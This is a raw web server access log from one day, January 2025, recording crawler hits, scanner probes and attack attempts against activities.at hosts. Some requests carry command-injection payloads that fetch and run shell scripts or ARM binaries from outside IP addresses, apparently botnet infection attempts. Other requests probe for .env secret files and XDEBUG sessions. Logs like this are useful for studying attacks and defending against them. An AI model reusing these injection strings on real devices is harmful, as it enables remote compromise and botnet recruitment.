156.59.198.136 - - [23/Jan/2025:01:08:41 +0100] "GET /ed.activities.at/stats/lang/awstats-de.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
57.128.229.1 - - [23/Jan/2025:01:13:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
146.19.24.168 - - [23/Jan/2025:01:20:47 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [23/Jan/2025:01:37:23 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image047.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
60.188.58.163 - - [23/Jan/2025:01:39:33 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
60.188.58.163 - - [23/Jan/2025:01:40:14 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
109.236.61.84 - - [23/Jan/2025:01:42:49 +0100] "\xff" 400 383 "-" "-"
86.164.20.152 - - [23/Jan/2025:01:46:20 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [23/Jan/2025:01:47:41 +0100] "GET /renault.activities.at/htdocs/binaries/10004867.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.146 - - [23/Jan/2025:02:10:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [23/Jan/2025:02:11:43 +0100] "GET /ed.activities.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:02:15:43 +0100] "GET /renault.activities.at/htdocs/binaries/10009029.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:02:19:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002261003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [23/Jan/2025:02:25:13 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
51.81.215.64 - - [23/Jan/2025:02:35:28 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
135.148.10.161 - - [23/Jan/2025:02:42:12 +0100] "GET /favicon.ico HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
156.59.198.135 - - [23/Jan/2025:02:48:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909030903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:02:52:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911051603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.10.129 - - [23/Jan/2025:02:54:10 +0100] "GET /shell?cd+/tmp;rm+holdarm+hold.arm7;wget+http:/\\/193.143.1.66/bins/hold.arm7;chmod+777+hold.arm7;./hold.arm7+hold.jaws;wget+http:/\\/193.143.1.66/bins/hold.arm;chmod+777+hold.arm;./hold.arm+hold.jaws HTTP/1.1" 404 280 "-" "KrebsOnSecurity"
156.59.198.136 - - [23/Jan/2025:02:56:06 +0100] "GET /docs/ecommlogistics/belege/STORNORE16-000008.PDF HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [23/Jan/2025:03:03:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
165.154.36.91 - - [23/Jan/2025:03:12:00 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [23/Jan/2025:03:16:08 +0100] "GET /docs/ecommlogistics/belege/GS16-000001.PDF HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:03:20:08 +0100] "GET /ed.activities.at/stats/lang/awstats-nl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.181.190.248 - - [23/Jan/2025:03:36:13 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.101 - - [23/Jan/2025:04:04:55 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.101 - - [23/Jan/2025:04:05:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [23/Jan/2025:04:05:01 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [23/Jan/2025:04:05:01 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [23/Jan/2025:04:05:01 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.135 - - [23/Jan/2025:04:05:35 +0100] "GET /docs/ecommlogistics/belege/AB16-000015.pdf HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:04:12:40 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109020903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.104.11.4 - - [23/Jan/2025:04:15:39 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [23/Jan/2025:04:16:41 +0100] "GET /renault.activities.at/htdocs/binaries/10069856.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:04:20:41 +0100] "GET /ed.activities.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [23/Jan/2025:04:33:29 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.135 - - [23/Jan/2025:04:38:45 +0100] "GET /ed.activities.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:04:50:46 +0100] "GET /renault.activities.at/htdocs/binaries/10623060.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.192 - - [23/Jan/2025:04:51:04 +0100] "\x16\x03\x01" 400 383 "-" "-"
198.235.24.192 - - [23/Jan/2025:04:51:04 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [23/Jan/2025:05:04:22 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009040803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.105.128.12 - - [23/Jan/2025:05:04:35 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
156.59.198.135 - - [23/Jan/2025:05:08:22 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911221003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:05:12:22 +0100] "GET /renault.activities.at/htdocs/binaries/10279221.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:05:16:22 +0100] "GET /renault.activities.at/htdocs/binaries/10223416.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
172.212.62.145 - - [23/Jan/2025:05:27:24 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
5.135.238.146 - - [23/Jan/2025:05:29:27 +0100] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
5.135.238.157 - - [23/Jan/2025:05:29:30 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
137.74.239.148 - - [23/Jan/2025:05:36:47 +0100] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
137.74.239.157 - - [23/Jan/2025:05:36:48 +0100] "GET /favicon.ico HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
156.59.198.136 - - [23/Jan/2025:05:44:25 +0100] "GET /ed.activities.at/stats/lang/awstats-cz.txt HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:05:48:26 +0100] "GET /renault.activities.at/htdocs/binaries/10444274.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:05:52:26 +0100] "GET /renault.activities.at/htdocs/binaries/10231944.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:05:56:26 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011231003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
116.48.99.147 - - [23/Jan/2025:05:59:43 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
95.214.55.43 - - [23/Jan/2025:06:00:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [23/Jan/2025:06:00:26 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image008.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
18.216.255.128 - - [23/Jan/2025:06:02:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
18.216.255.128 - - [23/Jan/2025:06:03:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
18.216.255.128 - - [23/Jan/2025:06:03:59 +0100] "\x16\x03\x01" 400 383 "-" "-"
49.143.97.111 - - [23/Jan/2025:06:04:15 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.135 - - [23/Jan/2025:06:04:27 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image040.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.116 - - [23/Jan/2025:06:26:34 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
156.59.198.135 - - [23/Jan/2025:06:30:41 +0100] "GET /ed.activities.at/stats/lang/awstats-en.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.181.190.248 - - [23/Jan/2025:06:42:40 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [23/Jan/2025:06:43:41 +0100] "GET /ed.activities.at/stats/lang/awstats-cy.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [23/Jan/2025:06:47:40 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.136 - - [23/Jan/2025:06:47:41 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010140903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:06:51:41 +0100] "GET /renault.activities.at/htdocs/binaries/10279334.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.16.225 - - [23/Jan/2025:07:07:44 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:07:15:43 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image127.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:07:19:44 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/dompdf_simple.png HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:07:23:45 +0100] "GET /ed.activities.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.50 - - [23/Jan/2025:07:27:46 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [23/Jan/2025:07:42:58 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
156.59.198.136 - - [23/Jan/2025:07:43:29 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911251703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:07:58:16 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202112031003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:08:20:36 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103261503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:08:24:36 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105311703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:08:28:36 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004170903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
13.64.194.18 - - [23/Jan/2025:08:37:12 +0100] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
179.43.191.146 - - [23/Jan/2025:08:43:39 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.189.182.234 - - [23/Jan/2025:08:49:33 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
5.181.190.248 - - [23/Jan/2025:09:00:24 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [23/Jan/2025:09:13:00 +0100] "GET /renault.activities.at/htdocs/binaries/10009030.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:09:17:00 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002141103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:09:21:00 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image048.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:09:25:00 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image121.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:09:29:01 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910171003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [23/Jan/2025:09:29:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
31.13.224.184 - - [23/Jan/2025:09:37:56 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.1000 Chrome/30.0.1599.101 Safari/537.36"
146.19.24.168 - - [23/Jan/2025:09:46:35 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [23/Jan/2025:09:55:06 +0100] "GET /renault.activities.at/htdocs/binaries/10442911.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.253.65 - - [23/Jan/2025:09:59:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
156.59.198.135 - - [23/Jan/2025:10:17:33 +0100] "GET /ed.activities.at/stats/lang/awstats-se.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:10:21:34 +0100] "GET /ed.activities.at/stats/lang/awstats-al.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:10:25:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007071803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [23/Jan/2025:10:29:45 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
92.255.57.58 - - [23/Jan/2025:10:37:52 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
218.161.102.245 - - [23/Jan/2025:10:54:19 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.135 - - [23/Jan/2025:11:09:10 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910211303_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:11:13:11 +0100] "GET /ed.activities.at/stats/lang/awstats-pt.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:11:17:11 +0100] "GET /renault.activities.at/htdocs/binaries/10052852.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:11:21:11 +0100] "GET /ed.activities.at/stats/lang/awstats-ua.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [23/Jan/2025:11:25:12 +0100] "GET /ed.activities.at/stats/lang/awstats-sk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [23/Jan/2025:11:29:12 +0100] "GET /renault.activities.at/htdocs/binaries/10331571.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [23/Jan/2025:11:33:38 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [23/Jan/2025:11:33:39 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [23/Jan/2025:11:33:39 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [23/Jan/2025:11:33:39 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [23/Jan/2025:11:33:39 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [23/Jan/2025:11:33:39 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [23/Jan/2025:11:33:39 +0100] "GET /gui/javascript/form_form.js?1737628419 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
